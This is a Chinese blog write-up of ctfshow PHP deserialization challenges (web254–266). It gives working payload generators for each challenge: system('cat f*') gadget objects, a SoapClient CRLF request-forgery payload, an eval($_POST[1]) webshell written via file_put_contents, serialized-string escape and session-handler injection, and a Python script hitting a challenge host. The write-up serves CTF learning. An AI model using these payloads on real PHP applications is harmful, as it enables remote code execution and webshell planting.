php反序列化(ctfshow)

最新推荐文章于 2026-03-20 11:28:57 发布
原创 最新推荐文章于 2026-03-20 11:28:57 发布 · 1.6k 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#php #开发语言 #后端

文章目录

简介

php序列化和反序列用到两个函数
序列化:serialize,将对象格式化为一个新的字符串
反序列化:unserialize,将字符串还原为原来的对象。
一般在CTF中,可以通过自己写php代码,并传序列化后的代码,可以覆盖原来的代码,从而改变代码执行过程,达到自己的目的(仅限我的理解)

入门

参考:
https://blog.csdn.net/solitudi/article/details/113588692?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163090819616780357263384%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=163090819616780357263384&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_v2~rank_v29-1-113588692.pc_v2_rank_blog_default&utm_term=php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96&spm=1018.2226.3001.4450

https://blog.csdn.net/q20010619/article/details/108352029?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163093042316780271566242%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=163093042316780271566242&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_v2~rank_v29-3-108352029.pc_search_result_hbase_insert&utm_term=php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96&spm=1018.2226.3001.4187

反序列化中常见的魔法函数

__construct 当一个对象创建时被调用
__destruct 当一个对象销毁时被调用
__wakeup() //执行unserialize()时,先会调用这个函数
__sleep() //执行serialize()时,先会调用这个函数
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当尝试将对象调用为函数时触发

web254

感觉和反序列化没有关系,直接通过URL参数传入,username=xxxxxx&password=xxxxxx

web255

看代码得知,url传参数?username=xxxxxx&password=xxxxxx
并且使得属性isVip=true,才可以得到flag
所以使用unserialize,改变原来代码的isVip属性值

<?php
class ctfShowUser{
    public $isVip=true;
}
echo serialize(new ctfShowUser);

然后用得到的字符串,写进cookie中

web256

看代码,需要满足username和password不相同
使用unserialize去构造字符串,使两者不同

<?php
class ctfShowUser{
    public $isVip=true;
    public $username='a';
}
echo serialize(new ctfShowUser);

web257

看代码,跟前面几个题不相同了,需要你通过eval的命令执行来得到flag
ctfShowUser类中的__construct()和__destruct(),可以执行其他类的代码

<?php
class ctfShowUser{
    private $class;
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    private $code='system("cat f*");';
}
$b=new ctfShowUser();
echo urlencode(serialize($b));
为什么需要用urlencode?

原因就是属性的修饰词不同,在反序列化中,private和protected都有例外
private:序列化后变量前\x00类名\x00 protected:序列化后变量前\x00*\x00

<?php
class xctf{
    private $flag = '111';
    public $a='222';
    protected $b='333';
    public function __wakeup(){
    exit('bad requests');
    }
}
$a=new xctf();
echo serialize($a.PHP_EOL);
?>

输出

O:4:"xctf":3:{s:10:"xctfflag";s:3:"111";s:1:"a";s:3:"222";s:4:"*b";s:3:"333";}

这样序列化后,出现了不可见字符
所以一般需要urlencode编码,当然在本地存储耿采用base64编码

处理不可见字符

1.可以使用urlencode
2.也可以将private或者protected改为public
3.或者将序列化后的字符串中,
private序列化后变量前加\x00类名\x00 		protected序列化后变量前加\x00*\x00

web258

代码

if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}

绕过正则,在O:后面加一个+来绕过正则,且

处理不可见字符,可以将private改成public

<?php
class ctfShowUser{
    public $class;
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    public $code='system("cat f*");';
}
$a=new ctfShowUser();
$b=serialize($a);
$b=str_replace('O:','O:+',$b);
echo urlencode($b);

web259

代码

<?php
$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff);

if($ip!=='127.0.0.1'){
	die('error');
}else{
	$token = $_POST['token'];
	if($token=='ctfshow'){
		file_put_contents('flag.txt',$flag);
	}
}
?>

考点:php原生类SoapClient

介绍
php在安装php-soap拓展后,可以反序列化原生类SoapClient,来发送http post请求。
必须调用SoapClient不存在的方法,触发SoapClient的__call魔术方法。
通过CRLF来添加请求体:SoapClient可以指定请求的user-agent头,通过添加换行符的形式来加入其他请求内容

SoapClient采用了HTTP作为底层通讯协议,XML作为数据传送的格式,其采用了SOAP协议(SOAP 是一种简单的基于 XML 的协议,它使应用程序通过 HTTP 来交换信息),其次我们知道某个实例化的类,如果去调用了一个不存在的函数,会去调用__call方法

具体的利用方式,上面链接有,我就不多阐述了。

同时也用到了CRLF漏洞

flag.php源码

<?php
$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff);


if($ip!=='127.0.0.1'){
	die('error');
}else{
	$token = $_POST['token'];
	if($token=='ctfshow'){
		file_put_contents('flag.txt',$flag);
	}
}

直接构造payload

<?php
$ua = "z3eyond\r\nX-Forwarded-For: 127.0.0.1,127.0.0.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 13\r\n\r\ntoken=ctfshow";
$client = new SoapClient(null,array('uri' => 'http://127.0.0.1/' , 'location' => 'http://127.0.0.1/flag.php' , 'user_agent' => $ua));

print_r(urlencode(serialize($client)));

其中content-type的需要与post的内容一致。

直接get传vip=xxx就可以了,最后访问/flag.txt应该就能拿到flag了。

web260

代码

<?php

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

if(preg_match('/ctfshow_i_love_36D/',serialize($_GET['ctfshow']))){
    echo $flag;
}

题目意思就是你序列化出来的东西需要包含字符串ctfshow_i_love_36D,
那我们直接传ctfhsow=ctfshow_i_love_36D就可以了。

web261

如果类中同时定义了 __unserialize()__wakeup() 两个魔术方法,
则只有 __unserialize() 方法会生效,__wakeup() 方法会被忽略。

当反序列化时会进入__unserialize中,而且也没有什么方法可以进入到__invoke中。所以直接就朝着写文件搞就可以了

只要满足code==0x36d(877)就可以了。
而code是username和password拼接出来的。
所以只要username=877.php password=shell就可以了。
877.php==877是成立的(弱类型比较)

payload

<?php
class ctfshowvip{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
}
$a=new ctfshowvip('877.php','<?php eval($_POST[1]);?>');
echo serialize($a);

web262

考查反序列化字符串逃逸。

代码

<?php
error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

highlight_file(__FILE__);

首先看到了这一行代码,就知道了是字符串逃逸

$umsg = str_replace('fuck', 'loveU', serialize($msg));

关于字符串逃逸,可以看看y4的博客

解题思路:

访问message.php,我们看到,需要token为admin才能输出flag

if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_COOKIE['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}

payload:

<?php
class message{
   public $from;
   public $msg;
   public $to;
   public $token='admin';
   public function __construct($f,$m,$t){
       $this->from = $f;
       $this->msg = $m;
       $this->to = $t;
   }
}
$f = 1;
$m = 1;
$t = 'fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}';
$msg = new message($f,$m,$t);
$umsg = str_replace('fuck', 'loveU', serialize($msg));
echo $umsg ;
echo "\n";
echo base64_encode($umsg);

因为fuck到loveU,多了一个字符,所以属于过滤后字符增多的情况

";s:5:"token";s:5:"admin";},27个字符,所以需要27个fuck

然后,我们可以直接GET传参或者base64编码后的结果放到cookie里面访问message.php,就可以拿到flag

web264

这个题跟web262不同的地方是,$_COOKIE换成 $_SESSION

关于两者和$_REQUEST的区别

PHP 中,cookie 就是服务器,它是留在客户端(浏览器)上的一个小的数据文件,通常用于标识用户信息,也称为浏览器缓存或 Cookies。
$_COOKIE[] 全局数组存储了通过 HTTP COOKIE 传递到脚本的信息,PHP 可通过 setcookie() 函数设置 COOKIE 的值,用 $_COOKIE[] 数组接收 COOKIE 的值,$_COOKIE[] 数组的索引为 COOKIE 的名称。

session 是一种客户与网站(服务器)更为安全的对话方式,一旦开启了 session 会话,便可以在网站的任何页面使用(保持)这个会话,从而让访问者与网站之间建立了一种“对话”机制。但是 session 不同于 cookie,必须先启动,才能生效。
$_SESSION[] 数组用于获取会话变量的相关信息。

$_REQUEST 支持 $_GET$_POST 发送过来的请求,即 get 和 post 它都可以接受,浏览器地址栏中的数据显示不显示要看传递的方法,get 会显示在 url 中(有字符限制),post 不会显示在 url 中,可以传递任意多的数据(只要服务器支持)。
默认情况下,$_REQUEST[] 数组包含了 $_GET$_POST$_COOKIE 的数组。

web262是cookie,所以我们可以通过直接给f,m,t赋值,然后得到base64加密后的序列化内容,然后通过cookie直接传入message.php

web264是session,直接设置在会话变量中,所以我们不能通过cookie传入了,只能在GET传入参数。

payload

f=1&m=1&t=1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck%22;s:5:%22token%22;s:5:%22admin%22;}

同时还需要cookie传参,msg=1,访问message.php

web263

考点:php的session反序列化漏洞

可以看看这篇文章

首先扫描,发现备份文件泄露,访问www.zip得到源码,观察源码

index.php

<?php
	error_reporting(0);
	session_start();
	//超过5次禁止登陆
	if(isset($_SESSION['limit'])){
		$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
		$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
	}else{
		 setcookie("limit",base64_encode('1'));
		 $_SESSION['limit']= 1;
	}
?>

其中js代码

<script>
		function check(){
			$.ajax({
			url:'check.php',
			type: 'GET',
			data:{
				'u':$('#u').val(),
				'pass':$('#pass').val()
			},
			success:function(data){
				alert(JSON.parse(data).msg);
			},
			error:function(data){
				alert(JSON.parse(data).msg);
			}

		});
		}
	</script>

因为index.php是把数据传入check.php,所以我们看check.php

<?php
error_reporting(0);
require_once 'inc/inc.php';
$GET = array("u"=>$_GET['u'],"pass"=>$_GET['pass']);
if($GET){
	$data= $db->get('admin',
	[	'id',
		'UserName0'
	],[
		"AND"=>[
		"UserName0[=]"=>$GET['u'],
		"PassWord1[=]"=>$GET['pass'] //密码必须为128位大小写字母+数字+特殊符号,防止爆破
		]
	]);
	if($data['id']){
		//登陆成功取消次数累计
		$_SESSION['limit']= 0;
		echo json_encode(array("success","msg"=>"欢迎您".$data['UserName0']));
	}else{
		//登陆失败累计次数加1
		$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit'])+1);
		echo json_encode(array("error","msg"=>"登陆失败"));
	}
}

check.php,验证账号密码是否正确

访问inc.php

<?php
error_reporting(0);
ini_set('display_errors', 0);
ini_set('session.serialize_handler', 'php');
date_default_timezone_set("Asia/Shanghai");
session_start();
class User{
    public $username;
    public $password;
    public $status;
    function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function setStatus($s){
        $this->status=$s;
    }
    function __destruct(){
        file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
    }
}

看到session.serialize_handler为php,这儿就可以用到php-session反序列化

显然,cookie中的limit进行base64解码之后传入session中,之后调用inc中的User类,并且其中这个User类中存在文件写入函数(file_put_contents),所以写入一句话即可,payload如下

<?php
class User{
    public $username = '1.php';
    public $password = '<?php system("catflag.php");?>';
    public $status='dotast';

}
$a=new User();
echo base64_encode('|'.serialize($a));

fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4OiJwYXNzd29yZCI7czozMDoiPD9waHAgc3lzdGVtKCJjYXRmbGFnLnBocCIpOz8

输出值存进cookie中,带着cookie去访问index.php,接着访问inc/inc.php,然后就会生成文件log-1.php,直接写一个脚本

import requests
url = "http://a768fa0f-b2b6-47dd-a787-5b1f3063ca7e.challenge.ctf.show/"
cookies = {"PHPSESSID": "4lppepr42tnnv98rca6ei55dun", "limit": "fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czoxMDoiZG90YXN0LnBocCI7czo4OiJwYXNzd29yZCI7czozMToiPD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/PiI7czo2OiJzdGF0dXMiO3M6NjoiZG90YXN0Ijt9"}
res1 = requests.get(url + "index.php", cookies=cookies)

res2 = requests.get(url + "inc/inc.php", cookies=cookies)

res3 = requests.get(url + "log-1.php", cookies=cookies)
print(res3.text)

web265

考点:php的按地址传参

在C语言中,可以传地址,如果一个变量的地址赋值给另一个变量,他们的值会同时改变。

所以,利用这个特性构造payload

<?php
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
    public function login(){
        return $this->token===$this->password;
    }
}
$a=new ctfshowAdmin(1,1);
$a->token=&$a->password;
echo serialize($a);

web266

考点:绕过大小写正则

if(preg_match('/ctfshow/', $cs)) {
    throw new Exception("Error $ctfshowo",1);
}

正则表达式后面没有i,所以区分大小写

直接构造payload

<?php
class ctfshow{
}
$a=new ctfshow();
echo serialize($a);

把生成的字符串里面的ctfshow改成大写的,就可以了。

对了,这个需要POST

补充知识点

php中输出打印的方式

echo ,有无括号都可以,输出字符串
print,可以打印字符串
printf,类似于C语言了,%s: 按字符串;
%d: 按整型;
%b: 按二进制;
%x:16进制;
%o: 按八进制;
$f: 按浮点型
print_r,专门用来输出数组类型
var_dump,可以输出字符串和数组,用来调试
die,停止下面的程序执行,并输出一定的内容
参考:
https://www.jb51.net/article/91388.htm
[渗透测试笔记] 14.php反序列化及利用原理
H4ppyD0g的博客
09-30 932
php序列化反序列化 php序列化就是将复杂的数据类型(比如说数组,字典,或者一个对象)转换为字符串,方便传输或者存库等操作,并且之后还能后恢复成原来的数据类型的过程。这样可以在不用这个数据的时候让它占用尽可能少的空间。 要注意的是,序列化只是对他的变量进行序列化,类中的函数是不会参与进来的。 php序列化反序列化的函数 serialize() 用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。 unseriali
PHP反序列化漏洞+CTF实例
hyq99999的博客
08-09 1673
整理php序列化相关知识点以及在CTF中的实例。
PHP反序列化【原理+CTF实战】
2301_80127209的博客
04-19 1724
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。序列化的目的是方便数据的传输和存储,在PHP中,序列化反序列化一般用做缓存,比如session缓存,cookie等.进行绕过,(在赛后我把题给Ssh1y写了,他的利用方式是nc反弹个shell,属实是开拓了我的眼界)。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。”,这显然就无法继续利用了。编码后在前部加7个1。
PHP 反序列化漏洞学习笔记(CTF向总结)
最新发布
YsChunQiu777的博客
03-20 497
操作说明序列化(Serialization)对象 → 字符串 / 数组反序列化(Deserialization)字符串 → 对象serialize() // 对象 → 字符串unserialize() // 字符串 → 对象自动触发无需手动调用在特定场景执行用户输入 → 控制对象 → 触发魔术方法 → 执行危险函数POP = Property-Oriented Programming(面向属性编程)核心思想:利用属性 + 魔术方法 形成调用链使用 unserialize()
原理+实践掌握(PHP反序列化和Session反序列化)
bylfsj的博客
03-22 1955
<p></p><h2 id="toc-0">前言:</h2> 最近又接触了几道php反序列化的题目,觉得对反序列化的理解又加深了一点,这次就在之前的学习的基础上进行补充。 0x00:PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表...
ctf中php反序列化汇总
2302_78903258的博客
07-19 2753
解题过程:首先需要找到最后的危险函数,看到了在Vox里面的include。然后想要使用include就要调用fun这个函数想要调用fun就要触发__invoke这个魔术方法__invoke() //当脚本尝试将对象调用为函数时触发作为函数就是添加了一个小括号去触发,发现在Petal类中__get方法具备这个调用函数的功能,所以需要去触发__get这个方法。
php反序列化 && 触发的魔术方法&& 原理 &&pop链构造 && ctfshow 练习
2301_81155391的博客
01-05 1433
序列化反序列化 是一种数据的传输方式 就如同 我们的主机的运输 我们为了方便会把主机的配件进行 拆分分类 (序列化) 运输到需要的人的那里他在组装起来(反序列) 这样的目的就是为了减少 空间的占用php反序列化漏洞的成因就是因为 序列化之后的数据 在服务器被反序列化之前 数据被窃取伪造为 pop链 导致 反序列化执行了一些恶意的被篡改的数据。
CTFSHOW-PHP反序列化
Monica的博客
09-24 3887
WEB254 题目: <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->
PHP反序列化花式攻击指南:以CTFshow题目为例的7种姿势详解
ansible6ops的博客
02-23 417
本文深入解析PHP反序列化漏洞的7种高级攻击技术,以CTFshow题目为例,详细讲解变量引用、对象销毁控制、正则绕过等技巧。通过实战案例展示Yii2反序列化漏洞链构造和字符串逃逸技术,并提供全面的防御方案与安全开发实践,帮助开发者有效防范此类安全风险。
ctfshow php反序列化
m0_74940843的博客
11-12 588
序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化php 将数据序列化反序列化会用到两个函数serialize 将对象格式化成有序的字符串unserialize 将字符串还原成原来的对象序列化的目的是方便数据的传输和存储,在PHP中,序列化反序列化一般用做缓存,比如session缓存,cookie等。常用的魔术方法。
ctfshow—web入门—php反序列化
m0_74013288的博客
11-12 3319
虽然序列化时会调用sleep()函数,给username和password赋值为空,但是反序列化时会进入__unserialize中,在最后进行反序列化的时候又会重现赋值,所以可以不用管这个函数,,,invoke函数也没有调用,所以不用管。分析代码,发现需要使ctfShowUser这个类里面的username和password不一样,因为是序列化对象的属性(变量)和构造方法内的变量赋值我们是可控的,所以我们将username和password改成不一样的就行。查看页面源代码,可以找到我们反序列化的入口;
CTF-PHP反序列化
m0_65336233的博客
10-18 1772
CTF-PHP反序列化
PHP反序列化学习笔记(CTF)
就是我的博客
08-26 2069
ctf中php反序列化学习
php 反序列化
qq_61774705的博客
06-04 327
PHP a - array b - boolean d - double i - integer o - common object r - reference s - string C - custom object O - class N - null R - pointer reference U - unicode stringO:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye
CTF php反序列化总结
m0_53567065的博客
11-17 6375
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
PHP反序列化】ctf基础知识
m0_74786138的博客
05-06 941
/基础定义public $a;//全部可用private $b;//外部不可用,只使用于当前类下//内部和子类可用。
CTF_Web:反序列化学习笔记(一)php中的类与对象
AFCC_的博客(Web_Dog)
08-13 2090
0x00 前言 前期第一次遇到反序列化这方面题目的时候,也看了不少资料,都是前辈们写的总结,但是都是直接从在ctf中的运用开始的,自己在这段时间整理的过程中,发现对于php类与对象了解不是很多,导致在看一些题目、或值前辈的总结时都比较困难,下面参考php文档,结合自己对php类与对象的理解先把反序列化的基础知识做一下整理。 0x01 php类与对象 class 在php手册中这样介绍: 每个类的定义都以关键字 class 开头,后面跟着类名,后面跟着一对花括号,里面包含有类的属性与方法
CTF中的PHP反序列化ALL IN ONE
热门推荐
Love&Share
09-01 1万+
CTF中的PHP反序列化 1.反序列化的基础知识 什么是序列化反序列化php反序列化序列化字符串知识,漏洞产生原因,修复方法 php反序列化漏洞,又叫php对象注入漏洞,是ctf中常见的漏洞。 PHP基础知识 PHP类与对象(https://www.php.net/manual/zh/language.oop5.phpPHP魔术方法(https://secure.php.net/manual/zh/language.oop5.magic.php序列化定义 php程序为了保存和转储对象,提供了序
CTF——php反序列化
m0_46317063的博客
11-26 515
记一次CTF解题
CTF-PHP反序列化漏洞5-反序列化字符逃逸
Eason_LYC安全白帽子的成长博客
05-15 2477
PHP反序列化漏洞是指攻击者通过构造恶意序列化数据,使得PHP反序列化函数在反序列化时执行了恶意代码,从而导致安全漏洞。其中,反序列化字符逃逸是指攻击者在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。具体来说,PHP反序列化函数在反序列化时,会对序列化字符串中的特殊字符进行转义,例如将双引号转义为\”、将反斜杠转义为\等。攻击者可以利用这个特性,在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值